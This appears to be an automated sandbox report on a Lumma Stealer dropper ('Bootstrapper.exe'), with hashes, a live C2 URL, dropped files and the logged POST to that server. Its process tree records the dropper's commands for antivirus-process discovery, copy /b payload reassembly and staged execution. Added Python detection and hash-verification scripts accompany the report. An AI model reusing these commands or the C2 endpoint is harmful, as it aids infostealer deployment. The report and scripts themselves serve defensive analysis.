Analysis

  • max time kernel
    122s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
  • submitted
    19/01/2025, 19:09 UTC

General

  • Target

    Bootstrapper.exe

  • Size

    120.0MB

  • MD5

    6a4e34aa83f72c212e76e1c228af6666

  • SHA1

    bff7c730078f0ccf5aa00c52ec0cc2fe38bd1f56

  • SHA256

    828b3c4a8e2c1eddc6bc54c1928ec562a9d4254f84a5545fa83d23419686240c

  • SHA512

    37f0d3ad8017357164aaed7664ce628491d5215c686fc798698db6d6b0f15705052dd6a10d39e8b5c98c6ba62e0f0eb451d581e3ecff530bd96cd4fb80998cfc

  • SSDEEP

    24576:utnbbEhDUbdE6bLdFiClougeEqsseyHCIAtcVZ0EIrGFTb7Tb7j:MEs/PdlhgPqsseyQtxE/Fr

Score
10/10

Malware Config

Extracted

Family

lumma

C2

https://deedcompetlk.cyou/api

Signatures

  • Lumma Stealer, LummaC

    Lumma (also written LummaC) is an infostealer written in C++, first seen in August 2022.

  • Lumma family
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 13 IoCs

    Attempts to gather information about the system language of the victim in order to infer the geographical location of the host.

  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of WriteProcessMemory 48 IoCs
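The signatures above are the sandbox's own tags. For a detection engineer the process tree that follows is the useful part: the `findstr` checks for security-product process names, the payload renamed to a `.cmd` and run, the `extrac32` unpack, the `copy /b` concatenation, a `.com` executed from a numbered directory under Temp, and `choice` used as a sleep are each cheap to match on process-creation telemetry, and several together are a strong signal. The following Python is an added example, not part of this report or of any vendor product: it applies those six heuristics to a list of events transcribed from the tree (with two constructed benign events for contrast). The event fields (pid, image, cmdline) are assumed to mirror what a Sysmon Event ID 1 or EDR process-creation feed provides.

```python
"""Heuristic matches for the dropper behaviour in this report's process tree.
Added example: the events below are transcribed from the report (plus two benign
events constructed for contrast), not taken from a live telemetry feed."""
import re

# Process names the batch script greps for, taken from the two findstr command lines.
AV_PROCESS_NAMES = {
    "opssvc", "wrsa", "avastui", "avgui", "bdservicehost",
    "nswscsvc", "ekrn", "sophoshealth",
}

# copy X X.cmd & X.cmd : an extensionless file renamed to a batch file and run at once.
RENAMED_BATCH_RE = re.compile(r"copy\s+(\S+)\s+\1\.cmd\s*&\s*\1\.cmd", re.I)
# copy /b a + b + ... dest : binary concatenation of fragments into one file.
COPY_B_RE = re.compile(r"copy\s+/b\s+(.+?)\s+\S+\s*$", re.I)
# A .com executable launched from a numbered directory under %TEMP%.
TEMP_COM_RE = re.compile(r"\\appdata\\local\\temp\\\d+\\[^\\]+\.com$", re.I)
# choice /d <default> /t <seconds> : a timed prompt used as a sleep.
CHOICE_SLEEP_RE = re.compile(r"choice\s+/d\s+\w\s+/t\s+\d+", re.I)
TOKEN_RE = re.compile(r"[A-Za-z0-9_.-]+")


def tag_event(event):
    """Return the set of heuristic tags that one process-creation event triggers."""
    image = event["image"]
    name = image.rsplit("\\", 1)[-1].lower()
    cmd = event["cmdline"]
    tags = set()
    if name == "findstr.exe" and any(
        t.lower() in AV_PROCESS_NAMES for t in TOKEN_RE.findall(cmd)
    ):
        tags.add("av_process_discovery")
    if name == "cmd.exe":
        if RENAMED_BATCH_RE.search(cmd):
            tags.add("renamed_batch_execution")
        m = COPY_B_RE.search(cmd)
        if m and len(m.group(1).split("+")) >= 3:
            tags.add("binary_concat_copy_b")
    # /E extracts a whole archive; the archive here carries no .cab extension.
    if name == "extrac32.exe" and re.search(r"\s/e\b", cmd, re.I) \
            and not cmd.strip().lower().endswith(".cab"):
        tags.add("lolbin_cab_extract")
    if TEMP_COM_RE.search(image):
        tags.add("exec_com_from_temp_subdir")
    if name == "choice.exe" and CHOICE_SLEEP_RE.search(cmd):
        tags.add("choice_sleep")
    return tags


def evaluate(events):
    """Map pid -> tags for every event that triggered at least one heuristic."""
    hits = {}
    for ev in events:
        tags = tag_event(ev)
        if tags:
            hits[ev["pid"]] = tags
    return hits


def triggered_tags(events):
    """Distinct heuristics seen across the whole tree; several together is the signal."""
    return set().union(*evaluate(events).values())


# Transcribed from the process tree in this report (pid, image, command line).
SAMPLE_EVENTS = [
    {"pid": 2448, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": r'"C:\Windows\System32\cmd.exe" /c copy Briefly Briefly.cmd & Briefly.cmd'},
    {"pid": 1212, "image": r"C:\Windows\SysWOW64\tasklist.exe", "cmdline": "tasklist"},
    {"pid": 2268, "image": r"C:\Windows\SysWOW64\findstr.exe",
     "cmdline": 'findstr /I "opssvc wrsa"'},
    {"pid": 2732, "image": r"C:\Windows\SysWOW64\findstr.exe",
     "cmdline": 'findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"'},
    {"pid": 2720, "image": r"C:\Windows\SysWOW64\extrac32.exe",
     "cmdline": "extrac32 /Y /E National"},
    {"pid": 1344, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": r"cmd /c copy /b 347157\Folding.com + Saddam + Visa + Bowling + Rt + Chapters"
                r" + Advertise + Continuous + Accessibility + Destruction + Architectural + Any 347157\Folding.com"},
    {"pid": 1972, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": r"cmd /c copy /b ..\Basement + ..\Florida + ..\Passenger + ..\Msg + ..\Welding + ..\Terrace + ..\Stretch j"},
    {"pid": 1936, "image": r"C:\Users\Admin\AppData\Local\Temp\347157\Folding.com",
     "cmdline": "Folding.com j"},
    {"pid": 2396, "image": r"C:\Windows\SysWOW64\choice.exe", "cmdline": "choice /d y /t 5"},
    # Two constructed benign events that must not match.
    {"pid": 9001, "image": r"C:\Windows\System32\findstr.exe",
     "cmdline": r'findstr /I "error" C:\logs\app.log'},
    {"pid": 9002, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd /c copy /b report.docx backup\report.docx"},
]

if __name__ == "__main__":
    for pid, tags in sorted(evaluate(SAMPLE_EVENTS).items()):
        print(pid, sorted(tags))
    print("distinct heuristics:", len(triggered_tags(SAMPLE_EVENTS)))
```

Each heuristic on its own is noisy (`findstr`, `copy /b` and `choice` are everyday admin tools); the value is in counting distinct heuristics under one `cmd.exe` ancestor within a short window, which the two benign events illustrate by matching nothing.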

Processes

  • C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
    "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
    1⤵
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:1640
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c copy Briefly Briefly.cmd & Briefly.cmd
      2⤵
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2448
      • C:\Windows\SysWOW64\tasklist.exe
        tasklist
        3⤵
        • Enumerates processes with tasklist
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        PID:1212
      • C:\Windows\SysWOW64\findstr.exe
        findstr /I "opssvc wrsa"
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2268
      • C:\Windows\SysWOW64\tasklist.exe
        tasklist
        3⤵
        • Enumerates processes with tasklist
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        PID:1776
      • C:\Windows\SysWOW64\findstr.exe
        findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2732
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c md 347157
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2600
      • C:\Windows\SysWOW64\extrac32.exe
        extrac32 /Y /E National
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2720
      • C:\Windows\SysWOW64\findstr.exe
        findstr /V "Cheese" Difficulties
        3⤵
        • System Location Discovery: System Language Discovery
        PID:1680
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c copy /b 347157\Folding.com + Saddam + Visa + Bowling + Rt + Chapters + Advertise + Continuous + Accessibility + Destruction + Architectural + Any 347157\Folding.com
        3⤵
        • System Location Discovery: System Language Discovery
        PID:1344
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c copy /b ..\Basement + ..\Florida + ..\Passenger + ..\Msg + ..\Welding + ..\Terrace + ..\Stretch j
        3⤵
        • System Location Discovery: System Language Discovery
        PID:1972
      • C:\Users\Admin\AppData\Local\Temp\347157\Folding.com
        Folding.com j
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        PID:1936
      • C:\Windows\SysWOW64\choice.exe
        choice /d y /t 5
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2396
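The two `copy /b` commands above rebuild the payload from the fragments listed under Downloads: eleven fragments are appended to the 1KB `347157\Folding.com` stub, and seven more are concatenated into `j`, which is then passed to `Folding.com` as its argument. The following Python script is an added example, not part of the sandbox report: it parses those two command lines, checks that the reported fragment sizes add up to the reported sizes of the assembled files (925KB and 494KB), and, given a copy of the Temp directory, concatenates the fragments in command order and compares the SHA256 with the values reported below. The command lines, sizes and hashes are copied from this report; the directory path and the per-command working directories (inferred from the paths in the Downloads list) are assumptions.

```python
"""Verify that the dropped fragments reassemble into the files the dropper builds
with `copy /b`. Added example: the command lines, sizes and hashes below are copied
from the sandbox report; nothing here is the dropper's own code."""
import hashlib
import re
import sys
from pathlib import Path

# Command lines exactly as recorded in the process tree (PIDs 1344 and 1972).
COPY_CMDS = [
    r"cmd /c copy /b 347157\Folding.com + Saddam + Visa + Bowling + Rt + Chapters"
    r" + Advertise + Continuous + Accessibility + Destruction + Architectural + Any 347157\Folding.com",
    r"cmd /c copy /b ..\Basement + ..\Florida + ..\Passenger + ..\Msg + ..\Welding"
    r" + ..\Terrace + ..\Stretch j",
]

# Fragment sizes (KB, rounded as the report rounds them) from the Downloads section.
REPORTED_KB = {
    r"347157\Folding.com": 1, "Saddam": 54, "Visa": 137, "Bowling": 106, "Rt": 86,
    "Chapters": 56, "Advertise": 55, "Continuous": 119, "Accessibility": 118,
    "Destruction": 75, "Architectural": 102, "Any": 15,
    r"..\Basement": 63, r"..\Florida": 81, r"..\Passenger": 68, r"..\Msg": 91,
    r"..\Welding": 83, r"..\Terrace": 50, r"..\Stretch": 58,
}

# SHA256 of the assembled files as reported (925KB Folding.com and 494KB j).
REPORTED_SHA256 = {
    r"347157\Folding.com": "1300262a9d6bb6fcbefc0d299cce194435790e70b9c7b4a651e202e90a32fd49",
    "j": "37204d5c24cd97f012e61ba6c4aab3f6bd8778237ecbec3080fa54bfa5dcaf67",
}

COPY_B_RE = re.compile(r"copy\s+/b\s+(.+)\s+(\S+)\s*$", re.IGNORECASE)


def parse_copy_b(cmdline):
    """Return (source_fragments, destination) for a `copy /b a + b + c dest` command."""
    m = COPY_B_RE.search(cmdline)
    if not m:
        raise ValueError("not a copy /b command: " + cmdline)
    parts = [p.strip() for p in m.group(1).split("+")]
    return parts, m.group(2)


def expected_size_kb(cmdline, sizes=REPORTED_KB):
    """Sum of the reported fragment sizes for one copy /b command."""
    parts, _ = parse_copy_b(cmdline)
    return sum(sizes[p] for p in parts)


def reassemble_bytes(parts, blobs):
    """Concatenate fragments in command order; return size and SHA256 of the result."""
    h = hashlib.sha256()
    size = 0
    for name in parts:
        h.update(blobs[name])
        size += len(blobs[name])
    return {"size": size, "sha256": h.hexdigest()}


def _local(cwd, win_relpath):
    """Map a Windows-style relative path from the command line onto the host filesystem."""
    return Path(cwd, *win_relpath.split("\\"))


def reassemble_from_dir(cmdline, cwd):
    """Read the fragments of one copy /b command relative to cwd, rebuild the output
    and report whether its SHA256 matches the value from the report."""
    parts, dest = parse_copy_b(cmdline)
    blobs = {p: _local(cwd, p).read_bytes() for p in parts}
    result = reassemble_bytes(parts, blobs)
    result["dest"] = dest
    result["matches_report"] = result["sha256"] == REPORTED_SHA256.get(dest)
    return result


if __name__ == "__main__":
    # Usage: python reassemble_check.py <copy of C:\Users\Admin\AppData\Local\Temp>
    # Working directories are inferred from the Downloads paths: the first command ran
    # in Temp, the second in Temp\347157. For the first command, 347157\Folding.com must
    # be the 1KB stub listed in the report, not the finished 925KB file.
    temp = Path(sys.argv[1])
    for cmd, cwd in zip(COPY_CMDS, [temp, temp / "347157"]):
        print(expected_size_kb(cmd), "KB expected from fragments;", reassemble_from_dir(cmd, cwd))
```

The size check alone already ties the Downloads list to the process tree: the eleven appended fragments plus the stub sum to 924KB against a reported 925KB (each size is rounded), and the seven `j` fragments sum to exactly 494KB. The hash check is the stronger test and only succeeds if every fragment is byte-complete and concatenated in the order the command line gives.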

Network

  • flag-us
    DNS
    oAyWcyFUJZdMRXTkifV.oAyWcyFUJZdMRXTkifV
    Folding.com
    Remote address:
    8.8.8.8:53
    Request
    oAyWcyFUJZdMRXTkifV.oAyWcyFUJZdMRXTkifV
    IN A
    Response
  • flag-us
    DNS
    deedcompetlk.cyou
    Folding.com
    Remote address:
    8.8.8.8:53
    Request
    deedcompetlk.cyou
    IN A
    Response
    deedcompetlk.cyou
    IN A
    172.67.164.84
    deedcompetlk.cyou
    IN A
    104.21.73.171
  • flag-us
    POST
    https://deedcompetlk.cyou/api
    Folding.com
    Remote address:
    172.67.164.84:443
    Request
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: deedcompetlk.cyou
    Response
    HTTP/1.1 200 OK
    Date: Sun, 19 Jan 2025 19:10:01 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Set-Cookie: PHPSESSID=r60hhimlvol4k4cig7ch0q8usg; expires=Thu, 15 May 2025 12:56:40 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hLleWf%2FUABzO29%2F5a7AQepcYR5dm0%2FpbxEpjaouLwUL1RVw4CMkAQe2fQgCkYDAzAx9aKy78sSkkivumsV2yECqIGYl6sKIFBWow%2B6VR2d7LzsmuILMfmco%2FVBFf7i1b2XFYkQ%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 90491f5b3e539499-LHR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=40727&min_rtt=25970&rtt_var=34617&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2861&recv_bytes=585&delivery_rate=130284&cwnd=253&unsent_bytes=0&cid=b459c66cd7fed376&ts=351&x=0"
  • 172.67.164.84:443
    https://deedcompetlk.cyou/api
    tls, http
    Folding.com
    981 B
    4.5kB
    9
    9

    HTTP Request

    POST https://deedcompetlk.cyou/api

    HTTP Response

    200
  • 8.8.8.8:53
    oAyWcyFUJZdMRXTkifV.oAyWcyFUJZdMRXTkifV
    dns
    Folding.com
    85 B
    160 B
    1
    1

    DNS Request

    oAyWcyFUJZdMRXTkifV.oAyWcyFUJZdMRXTkifV

  • 8.8.8.8:53
    deedcompetlk.cyou
    dns
    Folding.com
    63 B
    95 B
    1
    1

    DNS Request

    deedcompetlk.cyou

    DNS Response

    172.67.164.84
    104.21.73.171

MITRE ATT&CK Enterprise v15


Downloads

  • C:\Users\Admin\AppData\Local\Temp\347157\Folding.com

    Filesize

    1KB

    MD5

    bc0c466ea461f70dc2bab92020f1e643

    SHA1

    f17c66912508e95eac59bda2e773849600471a88

    SHA256

    f3c6eb4b4f81b5e1aa458d46225dccd651a2d44d1367a14718b6bb76beec1de1

    SHA512

    b1d03c359b8fcf46e7f07536004f7d11ab7bdd0cb044ca7bcfe63501428c4c93e43591e8367e5676478da8d554e4bd579cb6e37dc617f97f8a54a372361073c9

  • C:\Users\Admin\AppData\Local\Temp\347157\j

    Filesize

    494KB

    MD5

    549720d78c44a4ca96f98a02d7376be0

    SHA1

    c18a7ddd59ea61df41acfac5544aadc72bb6acba

    SHA256

    37204d5c24cd97f012e61ba6c4aab3f6bd8778237ecbec3080fa54bfa5dcaf67

    SHA512

    392674f314a993f0eb2e22354a9922b006e28b01cb2abdf416a188e48b8fbbea8df93cb793cefd6e91259b7de71c502ac1e5c33273d94e1a3671ee1147cbdab4

  • C:\Users\Admin\AppData\Local\Temp\Accessibility

    Filesize

    118KB

    MD5

    539587208032af4b529a60d530f100a4

    SHA1

    ef39ddfa82f53bde5a674e51318aa3ce9a8789b2

    SHA256

    bcee5e27e34159419173575bf6e22e23f0dad46cf6fa6aa84a1bb01c96516662

    SHA512

    4c261199485e6a40ce46147c98e244f1297446115ebd6c944a29e4242b361816980ccb6096286c8f9dbec00f13ea9fdfa417648980bf06721abc866630c5e53f

  • C:\Users\Admin\AppData\Local\Temp\Advertise

    Filesize

    55KB

    MD5

    eaab0c7db38adca2364923dc1bb8bacf

    SHA1

    182819623bdee90678ae233b8094d05e51d48d68

    SHA256

    5a5c226453b9c7c7f7bdb980ad2a02838456f9420d182d14c7336f8264a894f0

    SHA512

    53d2c6559e2d1e71b62f91444608f1e61a246433499b75d6e3193cfd645ac4af3c4e4e1359da02b522d1e121de31f51d0010d96e8ef435a92328cef69aba4910

  • C:\Users\Admin\AppData\Local\Temp\Any

    Filesize

    15KB

    MD5

    59051edf957c7f4fec5e278f07cfdaa9

    SHA1

    409217185334c187412941583e5814753d3f670f

    SHA256

    71cb36f1506fa645a90a6f06619b67c4f2f0e1e0140bac2e6f8a91ed1988446f

    SHA512

    f1897fa7dcc38c845cc3862f1eb33d493ca6c09338a6a7817fac6e99a72ecd07001a84e1935eccddf58e163fd8396c3333fad4c365cd5c8ade281dbc84735aba

  • C:\Users\Admin\AppData\Local\Temp\Architectural

    Filesize

    102KB

    MD5

    ac3b8c0b9d965801a696519bc3bce457

    SHA1

    c2fb54f9d7ffbbea6e5db175ca214eccc0b8ee7c

    SHA256

    fbc3b647efe255870931d9dfa77a43c7248a7d8613712bcf0663862a4e97fb66

    SHA512

    0aeeb7d05c46063a892b3aae756bfb92f245aae66c2fcd4c34610a348ad0c0904addabb99d97ca0c9c3cba3df7e8e96500f084b840487a9ed2582d1badf638c6

  • C:\Users\Admin\AppData\Local\Temp\Basement

    Filesize

    63KB

    MD5

    44a805a4e5ba191661485ef167275506

    SHA1

    45c2594c944f02e5260bd97a185c2f21ab232182

    SHA256

    e394dccd197c59fa4e2da7146174485a6681946d34faa3007bd5c1419d7125e0

    SHA512

    a3a8f7283ca0a0ae16b21f2b81b9cd48b953112c50e64b99daba378cd0e098108512566208365db4bb7b78355439f94bbcace6f5169091fab0202cf7d55f1952

  • C:\Users\Admin\AppData\Local\Temp\Bowling

    Filesize

    106KB

    MD5

    7cbcc0fbb084bead6d5bbb8a00cbb997

    SHA1

    75bfaaa5232ab2cf9f2291ee1ce08f2acb076ebb

    SHA256

    e0a98926b1e0968481640078ac6b833af96773a7f715851634346379f282795d

    SHA512

    6b33f8afe19a28e5b300e8a32c3ec98a0365fc1594c693c4527d9b0275f46f6558c50e29417499650d9c1ea7091ea7af340c4111b90af06c5ab4277170170c9a

  • C:\Users\Admin\AppData\Local\Temp\Briefly

    Filesize

    23KB

    MD5

    bb009bb1ab11657dd763b3a85e90f26f

    SHA1

    32fb786e48105f1574e8d345e66d2b16fc051d6e

    SHA256

    e7b3f1da61a207080f7859d12764b1243ce5c84beaf1a7f026b3d0da5f9dec4c

    SHA512

    ac73396967c496b93f8d4084537a286b4d5fe1315b0fd5992b03cc019521c1c25bafcb9826f85af59495a01ec711a2ec789c43af5befa46557f99224d0ce92bc

  • C:\Users\Admin\AppData\Local\Temp\Chapters

    Filesize

    56KB

    MD5

    19f399e75e91c4917cce10422db7b0fb

    SHA1

    145fb431681a91d64a77b0ca99ba31b4ed7457b9

    SHA256

    bbe32640a1be9b9dc5570043a2c72bd3d1da1e3480e61e41a1dc8daa42b07bd7

    SHA512

    25b85fe872e3e9fc5e70d3dfd1647a6bbf2919d67126bb9007dcc61aae549d64a9b79fd3c05bc996202b03630420ecb4eb5b5613d0a1adeab0d2670e6a5aff6f

  • C:\Users\Admin\AppData\Local\Temp\Continuous

    Filesize

    119KB

    MD5

    87cfc9cbddca81f037640e23869fd727

    SHA1

    e71c0a8106944e238edba3b2d6194cf5cb383168

    SHA256

    f648aed5047fa8e5b99ce81cf85f05f4cfb193b8b349e6e5656e5c6dd0917cb2

    SHA512

    2a3c9bbdbd222f9328b1379de025bff3f8d2c693fe68558cdb24a516ee7c9ac6615a9d1d62e4682532f8567138e67e6c26b6c7068d87b00415fc915172928e4f

  • C:\Users\Admin\AppData\Local\Temp\Destruction

    Filesize

    75KB

    MD5

    e9ed56e42470ceb7a46263c49b9d8110

    SHA1

    13794b6f705be789af214a4f81585dee3710512b

    SHA256

    d97494026b70f37cabc0ac614f54206ae2c5a5ab601b71888ae6491241dc2b20

    SHA512

    ca1c0f00a68267274e9d31f3a2de0fb34ccfce0a57d67ffe76633fe1a156c05f1381b0c696f75898fd8b370cb8a6e56174bdfb43729ab2668e444ee6748d8040

  • C:\Users\Admin\AppData\Local\Temp\Difficulties

    Filesize

    1KB

    MD5

    d2ac6356ed5ed3a32e46acb2f47d68f5

    SHA1

    e41205fe32c1ed0cc4a265e942dd472a76a22592

    SHA256

    6b6a43352b0b87107609d9c91992b30069200b308e5a2a50ed5a931315f82bdc

    SHA512

    47bafca4c789c7fad4db0534a93b8c7b659abb999393425f58d9b28ba553be1cc45b9001da1d5820e65b107034f48cd441c6855c7d7fc08117985d81054394a0

  • C:\Users\Admin\AppData\Local\Temp\Florida

    Filesize

    81KB

    MD5

    35ee0a5fee1964bd57f2c66347d726df

    SHA1

    d37bb5ba2456a310891f93d8e9ae1ad196dabcf6

    SHA256

    9b8ab89609b074479bc9fe749e12792c34ab4799ea7ea5ac67cdd3758a1c1181

    SHA512

    2006b993a36599a56131d744ea750a3de3d5eeb629d111d751d552e86cf3a4ea1c7d9b9dbb727e77b65ec8684cf0f22476840aed73df15186041b087476c0689

  • C:\Users\Admin\AppData\Local\Temp\Msg

    Filesize

    91KB

    MD5

    478eae0d2d8bc46181226c275688315d

    SHA1

    674d1c954b6ba8bc77ea6e112912b2fbde64fbeb

    SHA256

    aae6d5fc0e80a6033d55b81e05db13c66604f5fe453f78440de3912a44c553c1

    SHA512

    9833ef8d0d29cbf1b1738eefd4c175a169c770f70f2699bde703092e5102439c779e7474866534bba6b58f49d160a49be0750b686c171415191ddb10469eb26d

  • C:\Users\Admin\AppData\Local\Temp\National

    Filesize

    478KB

    MD5

    f5406ccecddc6c9bd30ed30343c756ab

    SHA1

    080ebf3593ee3c272e7e4f7c98fee6d326da45f8

    SHA256

    a46bd5c1472f8b655ace3314ca667d39b10d989b6f8ed17b6c753b8b947a6938

    SHA512

    a25eba5ea58855e65c529b858399b1574ccbed89038e90d50170562eceb11efba4f16242d54ad3b5232edc11f3f61109bbafc4398124c1bb45e43693657b1e81

  • C:\Users\Admin\AppData\Local\Temp\Passenger

    Filesize

    68KB

    MD5

    355fafaeefdaaa291b3f48356e24216c

    SHA1

    c675a50bffcf18f357966ec51e0adaf05a25b86b

    SHA256

    d3210c22706049ab7ca2304fd17507bfa4a842af579a00b60644e09178f9fddb

    SHA512

    f2fb4e46b4d6b24cba584e51c6a43e8ed1174a5048a69bd61a6e24e2772f389e55c2f6384d1ffe7c6f44eab8a6fe059608e39a0a60ad30f06eb63589c723ab4d

  • C:\Users\Admin\AppData\Local\Temp\Rt

    Filesize

    86KB

    MD5

    fc6c4e0bdb11443834c6af5b2ff6e6bb

    SHA1

    3c4bf0970e36371844c9a27a041fd09cbf65cf56

    SHA256

    445d2c74ae1ba5af2eba4cc4a4deeabbda1ef920e272ce9f54a7d9374eb23402

    SHA512

    9588272669bf2ecf277c83c836be28d4757a21b033e9919747fc11a7767abaf5d3af002d3379626b65e537aaa8fd2e30113994353592bcee577f3fbdd02dea5a

  • C:\Users\Admin\AppData\Local\Temp\Saddam

    Filesize

    54KB

    MD5

    7b8c4652937f053027395d23ef6c5b93

    SHA1

    3e203439da403069184a56d40d00b51e8a03a2cf

    SHA256

    733b3e2f49984688e345d1acb07d22c9d5e44742f572fd610c114c50c04c3024

    SHA512

    67b5aac27923f00fa7e39cefb6adc6714845cc9e3db51aa2fe8c910e09f95b2fe46ddc901257afa63ede0988792ee6245089ea419bd257e53f05c926793de929

  • C:\Users\Admin\AppData\Local\Temp\Stretch

    Filesize

    58KB

    MD5

    110f9b2d470e415d55f8a0d78ae1f8a1

    SHA1

    eeb9c0bf82f9a797fceed7d9725221348f45dcf1

    SHA256

    fbafdc9359e5294e8410d3862aee050c5cc03aec557bd83345bdca27981c0138

    SHA512

    1a8bf9fe93ff1b8cff52191bae71fed8822f4d99dd59ee6420709d037e26a185695e819535c793ffbe849e63637725e9ebdf487b57bb8f1ec3b4852e93954551

  • C:\Users\Admin\AppData\Local\Temp\Terrace

    Filesize

    50KB

    MD5

    6f3b4f30afb0c2fc164daaee95348815

    SHA1

    c59e8d78f11d5af9aca282d52752c0846292d5e6

    SHA256

    987fdfe4cb214563ecd4ba6d1990284e485a7701c323c1564d9d4afd3554c890

    SHA512

    ce51ba253dc008b82ae51ac797362f93515b1ef481d6189f596f74c1172379bfa4bb86aa713ea62520a11c24281047aaee0d203d48fa1f3dcdc5121fff385809

  • C:\Users\Admin\AppData\Local\Temp\Visa

    Filesize

    137KB

    MD5

    0fffca2125ec2d790c02b2bcd12ec8aa

    SHA1

    55883ab44b36fa0efe4747e2653786fbda5b60a5

    SHA256

    9dc03047dec2d31586916298828447b291b3eadae317bab07f8917e4bf4dde96

    SHA512

    53d6bb959d2d5ad5b3be4dde2b6c877eee4ae65e411f095bad980fc6ee58f49437dc8503186d544ab60aa6824cd70e616bf79cc13b713e27c5f75640db8ed70f

  • C:\Users\Admin\AppData\Local\Temp\Welding

    Filesize

    83KB

    MD5

    9a2d8d245f55c0918e6a7e8b9e22ed25

    SHA1

    827ace99c5e1570e3ea912e67dcf7ef6851c3ee1

    SHA256

    e252cd74c35df37627de02488911ecfc1d57320be7dec21a7de03ccb9664d84b

    SHA512

    076fba85e84cb31486a947e31c39464e08faacdad7b26645699f39fbe6f3d6bc6a7b926f46909f227e9c78f2ce8d9c2af0871e057db10345504db2226a2272c1

  • \Users\Admin\AppData\Local\Temp\347157\Folding.com

    Filesize

    925KB

    MD5

    62d09f076e6e0240548c2f837536a46a

    SHA1

    26bdbc63af8abae9a8fb6ec0913a307ef6614cf2

    SHA256

    1300262a9d6bb6fcbefc0d299cce194435790e70b9c7b4a651e202e90a32fd49

    SHA512

    32de0d8bb57f3d3eb01d16950b07176866c7fb2e737d9811f61f7be6606a6a38a5fc5d4d2ae54a190636409b2a7943abca292d6cefaa89df1fc474a1312c695f

  • memory/1936-581-0x0000000003AC0000-0x0000000003B1B000-memory.dmp

    Filesize

    364KB

  • memory/1936-580-0x0000000003AC0000-0x0000000003B1B000-memory.dmp

    Filesize

    364KB

  • memory/1936-582-0x0000000003AC0000-0x0000000003B1B000-memory.dmp

    Filesize

    364KB

  • memory/1936-583-0x0000000003AC0000-0x0000000003B1B000-memory.dmp

    Filesize

    364KB

  • memory/1936-584-0x0000000003AC0000-0x0000000003B1B000-memory.dmp

    Filesize

    364KB
